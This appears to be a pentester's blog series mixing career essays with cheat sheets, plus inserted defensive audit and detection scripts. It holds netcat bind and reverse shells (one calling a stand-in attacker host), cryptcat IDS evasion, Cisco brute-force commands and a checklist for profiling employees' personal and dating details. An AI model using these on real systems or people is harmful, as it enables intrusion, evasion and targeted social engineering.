PENTRN OffSec Penetration Testing Procedures (POPTP)?
cmdjunkie
In my endless quest to become a better programmer, hacker and penetration tester, I’ve realized that there is a nice balance between having the knowledge, applying pure skill and procedural methodology.  I’ve read numerous times that good programmers are born, not made; you’ve either got it or you don’t.  As much as I hate to admit it, I think this is somewhat accurate.   Granted, you can probably excel at anything you’re genuinely interested in getting better at, but you can’t make someone into a good programmer if they one, don’t care, or two, don’t have what it takes.  Programming is not about procedure, it’s a way of thinking that is exerted through intellectual application.  This is why software engineering is different from information security.

Information security, on the other hand, is highly procedural.  There’s hardly any abstract thinking involved and it functions best when there are rules and methodology to follow.  Security involves being thorough and identifying anomalies that may introduce risk or grant unauthorized access.  Security isn’t a science in that there’s no real way to test something and ensure that it’s 100% bulletproof.  When it comes to penetration testing, one cannot just whip out their guns and start firing at whatever is in front of them.  This is the true difference between software engineers and security folk.  Security folk, as much as I might get reamed for this, aren’t necessarily creative.  They’re good at following instructions.  Engineers tend to be visionaries, imagining something up and devising a plan to build it from scratch.

But I digress, because I’m drifting.  As a software engineer, I enjoy building things that stem from just the ether of my imagination.  I do however, want to continue to improve my penetration testing capabilities as I think it pretty much improves my overall hacking abilities.  Yes, my entire professional career is based around the fact that I’m chasing the title.  And not the title of senior engineer bla blah, or CIO of Corporate Company Inc… it’s the title of hacker; but more on that later.

When it comes to penetration testing, there absolutely have to be procedures to follow, otherwise it’s easy to get off track and lose where you are.  When specific procedures are followed, it’s easy to stay organized, and document your findings.  It’s also easy to stop, take a break, and pick up where you left off because you’re just going down a list.  Hacking, in the penetration testing sense is methodical.  Step 1, scan the network for open ports.  The skill that’s involved is how much you know about networks and how you can creatively accomplish the steps within the list you’re following.  All steps become tasks, tasks that can be accomplished any number of ways.

So with all that being said, penetration testers have their own procedures that they follow when they’re performing assessments.  I think it’s important to thoroughly develop your own procedures and follow them appropriately, adding new steps or tasks as your craft improves.  My theory consists of having a collection of procedures that apply to penetration tests from both a broad and specific perspective.  For example, procedures should be followed when gathering information on a target.  This should be a thorough list that is compiled with a documentation regimen that can be easily referenced and interpreted.


The following is my outline of the procedures I intend to develop to improve my penetration testing experience:

High Level Penetration Testing Procedures (HLPTP)
  R (Reconnaissance)
  E (Enumeration)
  A (Access or Attack)
  M (Maintaining Access)
  C (Covering Tracks)

Vulnerability scanners are noisy and unreliable because they generate a lot of false positives.  It’s more important to learn how to test these assets manually, using common tools for enumeration.

Network Component Penetration Testing Procedures (NCPTP)
  Windows Servers
    Windows XP Penetration Proc
    Windows 7 Penetration Proc
    Windows Server Penetration Proc
    Windows SQL Server Proc
      Identify what services are running
      Check for RPC/DCOM vulnerabilities
      Check for NULL Sessions
  Unix/Linux Servers
    *Nix Workstation Assessments Proc
    *Nix Server Assessments Proc
  Network Routers
    Cisco Switch and Router Enum Proc
    VPN Endpoint Assessment Proc
  Network Firewalls
    Firewall Security Assessment Proc
  Web Server Testing
    IIS Server Security Assessment Proc

I can envision an application that allows you to click through these procedures, eventually getting down to the steps to follow for the specific category you’re in.  This would make penetration tests easy to perform because the procedures are all in one place.  It’s basically all about enumeration.  You’re looking for holes in some network resource that could be exploited.  Without following specific procedures, these holes will not be found; at least not all of them.  The Enumeration phase is of the utmost importance.   And if you’re like me and you work for a company, this type of activity should be going on all the time.  That’s essentially what they’re paying you for: to find the holes in the assets that are critical to business operations.  Hell, if you’re not doing it, who is?

From a business perspective, you could take one category of Enumeration and focus on that all week, generating a report to discuss at the next security status meeting.  One week you can focus on Windows XP machines, and the next, just target the SQL servers in the environment.  This is a much more methodical way of working, and one that would actually work.

PENTRN Offsec Training Module
cmdjunkie
The PENTRN OffSec Training Module is something I’ve been hacking together for a while.  Back in 09 when I started to purchase books like the Amazon junkie that I am, I found myself consuming too many techniques which would eventually just become theory because I wasn’t practicing them enough.  I became consumed with trying to memorize syntax because I knew what I wanted to do, but I didn’t always remember the correct sequence of characters that would allow me to pull off the technique.  I began to realize that the majority of the attacks/techniques I was absorbing could be broken down into three primary categories:

1.) Technique
2.) Syntax
3.) Description

A technique is basically the name of whatever sequence of commands you’re executing.  For example, when you know you need to perform a man in the middle attack from a victim to a gateway in order to retrieve and analyze the traffic between them, do you really need to have the way in which it’s done memorized?  All you need to know is that you need to perform this technique/attack.  It’s about knowing what you have to do; which is the fundamental idea of it all.
The syntax of a technique is how it’s performed.  It’s the way in which you throw the command at the shell.  The syntax can be a one-liner or an entire sequence of commands that are performed in order to execute the technique/attack.  A one-liner technique would be something like “Sniff specific protocol traffic” with the syntax equating to “tcpdump icmp”.
The Description is relatively self-explanatory.  The Description describes why you would use this and in what types of situations.  I felt this was needed as well as important because it supplies context to the technique being performed.

UPDATE:  I realized that the tool was practically worthless unless it had a search feature built in.  This was completed a couple of days ago, and I'm happy to say that it's working quite nicely.  I've already found ways in which to use it in my regular work day, so I can't wait to have some more time to expand upon it.

The nice thing about it is the fact that the data resource is an XLS file.  It's easy to modify the data, edit or add new entries.  It's fully dynamic so as long as you're following the correct syntax and data structure the module will read the file accordingly.

In addition, my new project is a penetration testing procedural module that will put penetration testing procedures all in one place.  It's very likely that I'll combine the PENTRN Training Module with the Proc module, as it seems like the majority of the training module techniques and methods would fall under the "Access or Attack" phase of a penetration test.  More to come.  And I'll get around to making the Beta version of the PENTRN module available this weekend.

Cheers.

Security: A Practice in Futility
cmdjunkie
Why is it we do the things we do?  Why is it we try to learn as much as we can about this ever growing “industry” when we know… yes, we absolutely know that there’s nothing we can do.  I suppose some do it for a paycheck because right now the money’s good (I’m guilty of this), but can we honestly say we’re making progress, doing what we’re being paid to do; secure assets?

Maybe I’m just becoming far too jaded and cynical, but I really don’t see the point of this shit anymore.  I’m far more interested in just building good, functional software.  I believe that security starts with development, and building secure apps; something that is not really being taught at the university level yet.  I’m sure they’ll catch up in a couple of years…

As far as security goes, I stand by my opinion that it’s a practice in futility.  The industry is too broad to master.  There are too many pieces of security and that’s where it’s the most vulnerable.  One cannot become “good at security” because it’s just too damn wide (and deep).   Security needs to be split up into defined fields of practice, and those fields are what need to be studied.  There needs to be a level of specialization, but I suppose that only comes with time.   

One can and will drive themselves crazy working in this field because we’re up against adversaries that we cannot defend against.  We’re up against an enemy that we can’t see, that we have no idea where they’re coming from and we only really have a fixed amount of time before we have to throw in the towel and say, “welp… gotta get back to work”.

It’s the late nights working on some outrageously tedious issue, or trying to keep your skills relevant while you maintain some level of security at your place of employment, that make everything seem pointless.  When does it end?  When can we really take a break?  Some will argue that this is a good thing because InfoSec people will always have something to work on.  Is this really a good thing?  This means that everything was built without security in mind, so everything needs a little bit of attention.  At this point, everything is an attack vector.  Everything can be used in an exploit chain.  How do we cover all of that as security folks?  Why would we want to stress ourselves out thinking about this shit day in and day out?

When can we stop keeping our ear to the ground?  We can’t, because the second we do we’re at risk of compromise.  The second we let our guards down and stop learning new things, or stop actively defending against the major threat vectors we increase our risk of being owned.

I happened to get into this field because I had an interest in it.  My interest turned into a career; one that I’m not sure I want to keep pursuing professionally.  I’m so stressed out.  I’m losing sleep.  I’m constantly trying to improve my skills and what I know, but the more I learn and the more I increase my skill set, the more I realize how fucking pointless all of it is. 

subjust lines a planty
cmdjunkie
It's late.

PENTRN module is progressing nicely, with the latest implemented feature a dynamic discipline switch within the GUI.  It's got potential, simply because I want to use it.  I look forward to researching and engineering a search feature, as well as a pattern matching system that can be used to match syntax input from the user to a wide range of acceptable entries.

I'm not sleeping well.  Why am I still awake?

I'm giving a talk at a local community college.  It should internet well.  

Cisco Enumeration
cmdjunkie
Locate: v. To perform actions in attempts to enumerate or footprint.  These actions do not attempt to alter targets, they are to identify them.  This is important as it narrows down Points of Entry and saves time.  The first step is to Locate potential targets.  
Attack:  v. To perform an action with the intent of adverse results.  An attack can be anything you initiate that will affect some aspect of the network/system you’re targeting, be it the destination device/server or the network itself.  An attack can be a SynFlood, a bruteforce attack, a spoof, an MITM technique, etc.  Attacks exploit the rules of a system.  
Exploit: v. To initiate a targeted action on a specific vulnerable platform to generate specific results.  
Before you attempt to follow these procedures, you should know exactly what you want to do with the router, after you’ve gained access to it.  Make sure you do your research and familiarize yourself with the cisco device (and version) you’re targeting so you know exactly what it is you need to do once you gain access to the device.  

Tool: CAT (Cisco-Auditing-Tool)
Description: Bruteforces the telnet service running on Cisco devices.  This tool is useful if you have a lot of Cisco devices to audit.  You can feed it a list of nodes and check basic SNMP community strings and telnet passwords.

Tool: Ciscos
Description: Scans a network range for Cisco routers that haven’t had their default passwords changed from cisco.  This type of enumeration could turn up some interesting results.

Tool: Cisco-Torch.pl
Description: An all-in-one enumeration tool.  (Telnet, SSHd, SNMP, config, NTP, TFTP, webserver, IOS, https)

Technique: Brute force Cisco Telnet Auth
Syntax: ./CAT -h 10.176.3.21
Context: CAT will throw a series of passwords at the default telnet port of any host you direct it at.  Good for checking default configs.

Technique: Enumerate default configs
Syntax: ./ciscos 10.1.121 3 -C 10
Context: Scans for default configs on the class C with 10 threads.

Technique: Cisco Enumeration (All)
Syntax: ./cisco-torch.pl -A 10.10.0.0/16
Context: Performs all fingerprint scans available to cisco-torch.  (Telnet, SSHd, SNMP, config, NTP, TFTP, webserver, IOS, https)

Technique: Cisco Bruteforce Attack
Syntax: ./cisco-torch.pl -s -b -F hostfile.txt
Context: Performs a canned sshd bruteforce attack on the hosts specified in hostfile.txt.

Technique: Cisco Web Server Scan
Syntax: ./cisco-torch.pl -w -z 10.10.0.0/16
Context: Performs a web auth scan for Cisco devices that have open web servers.

##Tool Potential##
Python Script that would perform all of these commands, append the results to one big file and parse it out so the results are easily readable.  

The steps of compromise are to enumerate, identify vulnerabilities, plan the attack sequence, and exploit.  In any case, you are to find all Cisco devices on the network and then comb through them looking for devices that have out-of-date firmware or known vulnerabilities.    The Cisco Global Exploiter (cge) has a nice collection of exploits for Cisco devices.  The following list are the cge vulnerabilities and the Cisco devices they affect.  Keep in mind, Cisco routers aren’t updated as commonly as other resources on a network.  It takes an outage window and some downtime to perform updates.  When attempting to compromise Cisco devices, follow these procedures:
  1. Enumerate the network to locate all reachable cisco devices
  2. Fingerprint the discovered servers (version, ios version, etc.)
  3. Check for default configurations (Creds, SNMP strings)
  4. Cross reference discoveries with known vulnerabilities
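Step 3 (default creds and SNMP strings) is the part of this procedure that is easiest to turn into a repeatable check, and the same check is what an admin should run against their own running-config before anyone else does.  The script below is an added example written for this post; it is not cmdjunkie's code and not part of CAT, ciscos or cisco-torch.  It reads IOS-style config text (the sample config is constructed) and reports the settings the tools above look for: an `enable password` instead of `enable secret`, default or read-write SNMP communities without an access-list, default or type 7 passwords on the vty/con lines, and telnet left enabled.

```python
"""Audit Cisco IOS-style configuration text for the default and weak settings
that step 3 of the procedure above tells you to check for (default credentials,
SNMP community strings).

Added example; this is not cmdjunkie's code nor part of CAT, ciscos or
cisco-torch.  The sample config is constructed for the example.
"""
import re

# Factory defaults and wordlist staples; any of these in a config is a finding.
DEFAULT_SECRETS = {"cisco", "public", "private", "admin", "password", "secret"}

# Constructed sample: a router config carrying several weak settings.
SAMPLE_CONFIG = """\
hostname edge-rtr-1
!
enable password cisco
!
snmp-server community public RO
snmp-server community private RW
snmp-server community Xk9#q2Lm RO 10
!
line vty 0 4
 password cisco
 login
 transport input telnet ssh
!
line con 0
 password 7 094F471A1A0A
 login
"""


def audit_ios_config(config_text):
    """Return a list of (line_no, finding) tuples; line 0 means a global finding."""
    findings = []
    if not re.search(r"^service password-encryption$", config_text, re.M):
        findings.append((0, "service password-encryption is off; line passwords are stored in cleartext"))

    section = None  # the 'line vty/con/aux' block we are inside, if any
    for no, raw in enumerate(config_text.splitlines(), start=1):
        line = raw.rstrip()

        m = re.match(r"^line (\S+ .*)$", line)
        if m:
            section = m.group(1).strip()
            continue
        if not line.startswith(" "):
            section = None  # any unindented command (or '!') ends the block

        # 'enable password' is reversible (type 0/7); 'enable secret' is hashed.
        m = re.match(r"^enable password (?:7 )?(\S+)$", line)
        if m:
            findings.append((no, "enable password used instead of enable secret"))
            if m.group(1).lower() in DEFAULT_SECRETS:
                findings.append((no, f"default enable password '{m.group(1)}'"))

        # SNMP communities: default strings, read-write access, missing ACL.
        m = re.match(r"^snmp-server community (\S+)(?:\s+(RO|RW))?(?:\s+(\S+))?", line)
        if m:
            community, mode, acl = m.group(1), m.group(2) or "RO", m.group(3)
            if community.lower() in DEFAULT_SECRETS:
                findings.append((no, f"default SNMP community '{community}' ({mode})"))
            if mode == "RW":
                findings.append((no, f"read-write SNMP community '{community}'"))
            if acl is None:
                findings.append((no, f"SNMP community '{community}' has no access-list restriction"))

        # Passwords and transports on vty/con/aux lines.
        if section:
            m = re.match(r"^\s+password (?:0 )?(\S+)$", line)
            if m and m.group(1).lower() in DEFAULT_SECRETS:
                findings.append((no, f"default password on line {section}"))
            if re.match(r"^\s+password 7 \S+$", line):
                findings.append((no, f"type 7 (reversible) password on line {section}"))
            if re.match(r"^\s+transport input .*\btelnet\b", line):
                findings.append((no, f"telnet permitted on line {section}"))

    return findings


if __name__ == "__main__":
    for no, msg in audit_ios_config(SAMPLE_CONFIG):
        print(f"line {no:>3}: {msg}")
```

Run against the constructed config it reports eleven findings; against a config with `service password-encryption` and an `enable secret` it reports none.  The line-number bookkeeping matters because `password cisco` under `line vty 0 4` is a remote-login credential while the same text under `line con 0` only matters with physical access, so the report names the section.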

The Motivesto
cmdjunkie
The motivation behind the obsession we have with the things we do is about power.  It has everything to do with the ability to think, "I can own you if I want to".  Because the truth of the matter points to the idea that it doesn't matter what you do, or what level of success you've obtained, you rely on technology to do everything.  When the reliance on technology becomes a dependence, it’s individuals like myself…ourselves, that then have all the power.  

But there’s more to it than that these days.  This curiosity, this lifestyle, it is all leading up to something much more meaningful and significant.  I see it every day on my news feeds and in the broadcast news: a storm is brewing; we’re in the beginning stages of a silent war.  It’s a new age war, and believe it or not, it’s happening right now.  It is us, my people, my digital brethren, that will be responsible because we are the ones that understand this new threat.

Fundamentals of Initials
cmdjunkie

Oftentimes we just don’t know where to begin.  There’s so much to explore and research, it’s almost impossible to cover all of the bases.  This is where a checklist comes into play.  A checklist… well, more like some guidelines to walk through as you begin information gathering.

Information gathering is of the utmost importance.  Penetration Testing requires you to be an excellent researcher; one that can use conventional and non-conventional means of gathering information.  The areas that should be covered almost immediately are the following:

1.) G2 – What I like to call the G2, is the Google 2.  This means, the absolute first thing you do is spend at the least, 2 hours researching your target using Google.  Bust out the Google Hacking ref and start getting creative with searches. Here are some Initial G2 Steps to Take (IG2ST):

a. Identify the Web Server and Version Number
b. Perform a //:googleSite:: to Identify Reachable and Indexed Hosts
c. Identify Vulnerabilities for Target’s Web Server Version (Low Hanging Fruit [LHF])
d. Search and Archive any Exploits for Discovered Vulnerabilities
e. Search for Reachable Office Files (DOC, PPT, XLS, ADB, VSD)
f. Search for Login/Password Pages
g. Search for PDF Files
h. Search for Email Addresses

After you feel satisfied with your findings, go back, review what you have and organize it in a suitable and manageable manner.

2.)Email Harvest – Right off the bat, when you perform the Initial Mandatory Email Harvest (IMEH), you obtain the target’s naming convention, micro-targets inside (or associated with) the Main Target, as well as Individuals that lead to secondary points of access/entry.  Alternatively, if your target is an individual, this step should be to gather a Contacts and Associates List (CAL).  They both should be organized the same way and expanded upon as information about each Individual/contact is delved into.

# goog-mail.py target.com


There are certainly more ways to harvest emails from a web site or the web.  Just be sure to organize them well.  After you've got a significant list, spend some time researching a couple of them.  Maybe you'll find one that looks like an easy target to exploit.  Maybe you'll find one with an online dating account.  The object here is not to look at the emails as just addresses, but as Assets, and PPOE.  This becomes a matter of trust exploitation because familiarity breeds trust.  As does association, obviously.  

Researching an Asset

  1. Search for email address
  2. Identify secondary email address (personal, business, legacy)
  3. Identify Real Name
  4. Identify Address
  5. Identify Phone Number
  6. Identify Former-Address
  7. Identify High School and College
  8. Identify Social Networking Presence
  9. Identify Online Dating Presence
  10. Identify at least 5 friends or associates.  (Family, Co-workers, ex's, College Friends, Roommates, etc.)

3.)Perimeter Enumeration – For a company, this is performed by identifying all Potential Points of Entry (PPOE) in the Public Facing systems that are available to the Internet.  This step includes:

a.   Identify the network ranges owned and operated by the target
# whois [target.com]
# dig [target.com]

b.   Identify the mail servers
# nslookup -type=mx [target.com]

c.   Identify the DNS Servers
# nslookup -type=ns [target.com]

d.   Perform a Forward Lookup Bruteforce (FLB)

e.   Perform a reverse lookup bruteforce on the network ranges owned and operated
# for ip in $(seq 1 255); do host 216.200.241.$ip | grep "domain name pointer"; done

f.       Attempt a Zone Transfer on the DNS Servers Identified

#!/bin/bash

echo "[+] Enter domain name:"
read domain

# ask each authoritative name server for the zone and keep only the A records
for fqdn in $(host -t ns "$domain" | cut -d " " -f4); do
    host -l "$domain" "$fqdn" | grep "has address"
done

These should be the first steps you take, regardless of whether you’re just peepin or actually on a job.  The reason is that this is non-intrusive enumeration that happens very often.  It would be difficult to identify malicious intent from an NSD’s perspective because whois and ns queries are very commonplace among typical inbound traffic into private networks.  Typical probes.  Although the attempted Zone Transfers can trigger low-impact alarms, they are still very commonplace, and any admin worth his/her salt should have zone transfers disabled.
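The paragraph above says the zone transfer attempt (step f) is the one thing in this list that trips alarms, and the reverse-lookup loop (step e) is the other one that leaves a recognizable footprint on the name server.  As an added example, not code from the original post, here is what that alarm looks like from the admin's side: a parser over BIND-style query log lines (the lines are constructed for the example, and the list of secondaries allowed to pull the zone is an assumption) that flags AXFR/IXFR requests from anyone else and a client that walks a block of PTR names.

```python
"""Spot the noisy parts of the perimeter enumeration above (zone transfer
attempts and reverse-lookup sweeps) in a name server's query log.

Added example, not the post's own code.  The log lines follow a simplified
BIND-style 'queries' log layout and are constructed for the example; the
allowed-secondary list is an assumption.
"""
import re
from collections import defaultdict

# Name servers that are legitimately allowed to pull the zone (assumed).
ALLOWED_AXFR_SOURCES = {"198.51.100.2"}
# Distinct PTR names one client may ask for before we call it a sweep.
PTR_SWEEP_THRESHOLD = 20

QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<src>[\d.]+)#\d+ \([^)]*\): query: "
    r"(?P<qname>\S+) IN (?P<qtype>\S+)"
)


def parse_query(line):
    """Return (src_ip, qname, qtype) or None if the line is not a query record."""
    m = QUERY_RE.search(line)
    if not m:
        return None
    return m.group("src"), m.group("qname").rstrip(".").lower(), m.group("qtype").upper()


def analyze_query_log(lines):
    """Return alert strings for zone-transfer attempts and PTR sweeps."""
    alerts = []
    ptr_names_by_client = defaultdict(set)
    for line in lines:
        parsed = parse_query(line)
        if parsed is None:
            continue
        src, qname, qtype = parsed
        if qtype in ("AXFR", "IXFR") and src not in ALLOWED_AXFR_SOURCES:
            alerts.append(f"zone transfer ({qtype}) for {qname} attempted from {src}")
        if qtype == "PTR" and qname.endswith(".in-addr.arpa"):
            ptr_names_by_client[src].add(qname)
    for src, names in sorted(ptr_names_by_client.items()):
        if len(names) >= PTR_SWEEP_THRESHOLD:
            alerts.append(f"reverse-lookup sweep: {src} queried {len(names)} distinct PTR names")
    return alerts


def _line(src, qname, qtype):
    # Build one constructed log line in the layout parse_query expects.
    return (f"12-Mar-2012 02:14:07.113 client {src}#5123 ({qname}): "
            f"query: {qname} IN {qtype} +E (192.0.2.53)")


# Constructed sample log: ordinary traffic, one AXFR from the legitimate
# secondary, one AXFR from an outsider, and a reverse sweep by that outsider.
SAMPLE_LOG = [
    _line("192.0.2.10", "www.example.com", "A"),
    _line("192.0.2.11", "example.com", "MX"),
    _line("203.0.113.5", "example.com", "NS"),
    _line("198.51.100.2", "example.com", "AXFR"),
    _line("203.0.113.5", "example.com", "AXFR"),
    "12-Mar-2012 02:14:09.001 zone example.com/IN: loaded serial 2012031201",
] + [_line("203.0.113.5", f"{i}.2.0.192.in-addr.arpa", "PTR") for i in range(1, 26)]


if __name__ == "__main__":
    for alert in analyze_query_log(SAMPLE_LOG):
        print(alert)
```

On the sample log this yields two alerts, both for 203.0.113.5: the AXFR it was not allowed to make and the 25 PTR names it walked.  The whois and NS lookups from the same address raise nothing, which is the point the post makes: those blend in, the transfer and the sweep do not.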

More to Come


Network NC Shell Review
cmdjunkie

Network Shell Review:  Having a shell flying through a network is malicious.  Most IDS solutions will identify a shell traversing a network segment quicker than you can say, “busted”.  To get around that, use cryptcat when placing shells on a system.  The file is larger, but the method is hard to detect.   

Netcat Uses:

Bind_Shell:  A bind shell is a shell server waiting to be connected to.  A bind shell works by spawning a shell command line when the listening port is connected to.  In netcat, you can fire up a bind shell with the following commands:

WIN: >> nc -lvp 443 -e c:\windows\system32\cmd.exe

NIX: >> nc -lvp 445 -e /bin/bash

Be sure to swap out nc for cryptcat when you get a chance

Reverse_Shell:

A reverse shell is an outbound connection that’s carrying the shell with it in transit.  Like I mentioned above, this is not a new attack or technique.  Most IDS systems will identify a cmd.exe or bash shell being sent out to the Internet.  In fact, most AV systems that are minimally kept up to date will probably quarantine nc.exe before it even has a chance to execute.  Anyway here’s a reverse shell

Attacker:  WIN >> nc -l -p 443

Target: NIX >> nc -nv the.attackersip.net 443 -e /bin/bash
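The post says twice that an IDS will spot a cmd.exe or bash shell crossing a network segment.  As an added example (not cmdjunkie's code, and not any IDS's actual ruleset) here is the kind of byte-signature check that does it, run over constructed captures of the bind and reverse shells above: the Windows banner and `C:\...>` prompt, a `user@host:~$` prompt and `id` output, plus a protocol check for cleartext on a port where TLS is expected (the shells above both use 443).

```python
"""Signature checks of the kind an IDS applies to the netcat shells above:
a cmd.exe banner or a *nix shell prompt crossing the wire in the clear, and
non-TLS bytes on a port where TLS is expected.

Added example; not cmdjunkie's code.  The captured payloads are constructed.
"""
import re

# Byte patterns that mark an interactive shell moving over the network.
SHELL_SIGNATURES = {
    "windows-cmd-banner": re.compile(rb"Microsoft Windows \[Version [\d.]+\]"),
    "windows-cmd-prompt": re.compile(rb"[A-Za-z]:\\[^\r\n]*>"),
    "unix-shell-prompt": re.compile(rb"(?m)^[\w.-]+@[\w.-]+:[^\s$#]*[$#] ?$"),
    "unix-id-output": re.compile(rb"uid=\d+\([^)]*\) gid=\d+\([^)]*\)"),
}

# Ports on which a defender expects a TLS record, not a cleartext shell.
TLS_PORTS = {443, 8443}


def looks_like_tls(payload):
    """True if the payload starts like a TLS record: content type 0x14-0x17, version 3.x."""
    return len(payload) >= 3 and payload[0] in (0x14, 0x15, 0x16, 0x17) and payload[1] == 0x03


def classify_payload(payload, dst_port):
    """Return the names of the signatures matched by one captured TCP payload."""
    hits = [name for name, pat in SHELL_SIGNATURES.items() if pat.search(payload)]
    if dst_port in TLS_PORTS and payload and not looks_like_tls(payload):
        hits.append("non-tls-on-tls-port")
    return hits


# Constructed captures: (description, destination port, payload)
SAMPLE_CAPTURES = [
    ("bind shell answering on 443", 443,
     b"Microsoft Windows [Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation."
     b"  All rights reserved.\r\n\r\nC:\\Windows\\system32>"),
    ("reverse shell to 443, id output", 443,
     b"uid=1000(joe) gid=1000(joe) groups=1000(joe)\njoe@webbox:~$ "),
    ("real TLS client hello on 443", 443,
     bytes([0x16, 0x03, 0x01, 0x00, 0xf4]) + b"\x01" * 20),
    ("plain HTTP on 80", 80, b"HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n<html>"),
]


def scan_captures(captures):
    """Map each capture's description to the signatures it triggers."""
    return {desc: classify_payload(payload, port) for desc, port, payload in captures}


if __name__ == "__main__":
    for desc, hits in scan_captures(SAMPLE_CAPTURES).items():
        print(f"{desc}: {hits or 'clean'}")
```

Both shell captures light up two content signatures plus the port mismatch, while the genuine TLS hello and the HTTP response match nothing.  An encrypted shell (which is why the post reaches for cryptcat) would match none of the byte patterns either, which is the argument for keeping the protocol-versus-port check and connection-behaviour monitoring alongside content signatures rather than relying on banners alone.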

HoneyPot NC:  Honeypots are dummy systems, setup to represent real systems that look appealing to attackers.  A crafty way to setup a linux machine to look like a Windows machine to attackers is to use netcat to open standard windows ports.  You can catch all type of good stuff:

#!/bin/bash
# listen on the common Windows ports one after another, logging whatever comes in
while true; do
    nc -l -p 137 >> capture.txt
    nc -l -p 139 >> capture.txt
    nc -l -p 445 >> capture.txt
done

Port Redirector: Netcat is useful for redirecting ports as well.  Use the following command to act as a proxy server:

# nc -l -p 8888 -c "nc google.com 80"

Once you connect to this machine on port 8888, you have a connection to google.com on 80.  Run a quick HTTP GET and watch the server ID come back to you.

--EXTRAS:

Persistent Netcat Listener

# while true; do echo "Started"; nc -l -p 41523 >> capture.txt; done


Corporate Security, Software Engineering and the Truth of the Industry
cmdjunkie

A little background: I’ve been a Security “Professional” since 2007.  I started at a small company that just did consulting and eventually went to work for the government for 4 or so years.  Over time, my idea of what Security work should be and what it actually was grew further and further apart.  Eventually, I found myself versed and experienced enough to really see the trouble that lies ahead.  Yes, I started to realize the absolute inevitability of working in Information Security for a mid-large sized financial organization; there’s nothing you can do to prevent problems and headaches… just detect it, respond to it appropriately and get back to work.

Business Security: Information Security in a corporate setting, characterized by misused talent, security budget meetings and fancy pie charts for management.  Business Security in all its glory is just another department in your typical, large, office building.  Business Security is doing a product analysis to determine what DLP solution you want to implement over the next quarter or two.  Business Security is being forced to listen to users complain about VPN connectivity when you know damn well it’s their home internet connection.  Business Security is satisfying your direct reports… and their direct reports… and their direct reports.  Business Security is going to the security conventions to network and pass out your new business cards with that shiny new minted CISSP accreditation appended to your name.

Business Security is what’s wrong with Security.

But it keeps money in your wallet and food on the table you say?  This is true, but it comes with the cost of your dignity and reputation.  Business Security is a farce.  The allegedly more secure firms and organizations are still at risk of compromise because all it takes is a dedicated attacker.  Seriously, let me repeat that, all it takes is a dedicated attacker.

It’s not a matter of if you’ll get attacked, it’s when.  Everyone at this point is at risk and as a security professional, there’s really nothing you can do to stop it.  And consequently, you’ll wind up getting blamed.  How can you possibly work to secure every single attack vector your company has implemented in order to appease the employees?  Personally, I’m the sole security engineer for my company.  Given, it makes me feel great that I’ve found myself in this position, but at the same time, I’m well aware of what’s possible, what criminals are capable of, and how they can and will go about doing it.  It’s a stressful profession, and I don’t like stress.

Now, I’ve been in school for Software Engineering for the better part of 3 years.  Technically, I’m a junior, but similar to my high school experience, I should have graduated by now.  Anyway, I find software development to be the absolute panacea to hyper-paranoid security work.  As a programmer, I can literally just conjure up an idea and make it happen.  As a programmer, I can turn thought into reality.  I can build tools, bridges, communication means, secure transport options, automated robots, slick interfaces, and digital gateways to real world information.  Programming and Software Construction is the art of transforming brainwaves into an intangible interactive product.  Programming is rooted in creativity and logic.  Not only that, but when the solution is built and the requirements are met, you’ve completed something, and you’ve created something as well.  Software developers are essentially the Gods of the virtual world.  We create the cities, communities, tools and metaphorical vehicles that allow people to navigate and live in these worlds.  There’s a power complex to it, and each programmer will tell you they’re a genius in their own mind.

The security world has a few subdivisions that should be mentioned, as not all security personnel are the same.  Consider the idea that InfoSec has skyrocketed in the last 10 years as not only a lucrative career, but as a general item of business interest. It has become a hot topic and a magnet for confused college graduates trying to get a good paying job.  Entry into the field is simple if you’ve obtained a CISSP (which is a bootcamp and a $500 test fee away) in addition to the degree in Art History you managed to obtain.  These watered down newly minted CISSPs find their way into a company’s risk management team and voila, 65k/year and the ability to say you work in InfoSec.  Now, I’m not saying these people are worthless, because they do have their purpose.  I’m saying there should be divisions within Security, and because there aren’t, these individuals get grouped with guys like myself.

--Guys like myself…  Now before I delve into the security guy that I represent, allow me to briefly touch upon the hardcore security junkie.  The hardcore security junkie is the guy that has no social life but seems to basically know everything there is about security.  Hardcore Sec Junkies write highly specialized books on specific topics, blog endlessly about their research, and still have time to watch their company’s network.  These are the people that wind up going into business for themselves doing security consulting because they’re that damn good.  These are the guys you want working for you, not against you.  Oftentimes, these guys will have a couple of SANS certs, a published white paper and an affinity for energy drinks.  (Generalization, I know… don’t hate).  These guys you should know exactly what to do with… put them in the basement, let them hack.

Now… Security guys like myself are enigmas.  Personally, I’m not obsessed with security.  Oftentimes I just want to go home and leave my desk alone.  I hardly ever do that, but I do get burnt out.  Guys like myself I like to refer to as idealistic generalists.  I (we) have an idealistic point of view when it comes to the internet, computer use, security, and software development.  The world is bigger than Defcon and Blackhat.  The idealistic security generalist should actually not have the word security in the description.  I don’t want to put myself in a box and call myself a security professional; I’m so much more than that.  I actually like to program.  It’s my chosen career choice.  I like to go out and meet people, flirt with women and stay active.  I realize that I’m never going to have the time to become as incredibly deadly as I want to be with BackTrack but you know what?  That’s okay.  I’ve said it before and I’ll say it again, security is too wide spread to be mastered, and that’s where the problem is.

Personally, I’d rather study software engineering, which actually has limits to the foundations on which you learn.  Granted, there’s still a lot to learn, but the difference is in the execution.  As a programmer, you can take a learned concept and apply it in many different ways, limited only by your skill-set as a programmer and your imagination.  There are no limits in programming and software development once you solidify your fundamental understanding of current construction models and trends (e.g. OOP).  As a programmer, you’re only responsible for the attention you've paid to the code that you’ve written.  You’re limitless; without limits… no limits.  Security on the other hand is one big prison that gets smaller and smaller the more you become aware of security concepts.  I challenge any seasoned security professional to tell me they sleep well at night because they’re sure that nothing can go wrong.  When you’re a security professional and you’ve trained your brain to think the worst, to consider the weak points of compromise and to find methods of circumvention, everything is insecure to you.  Security is not necessarily something you can be good at; it’s just something you increasingly become more versed in.  When you continue to practice security you start to realize that everything you do is pretty much useless because you’re aware of what the guys that have all the time in the world are capable of.  Nietzsche said, “whoever battles monsters should take care not to become a monster too, for if you stare long enough into the abyss, the abyss stares also into you”.  To relate that to the Security Profession, when you’re in the trenches, reading about new exploits every day and the crackers that write them, you start to understand that you’re fighting a losing battle.

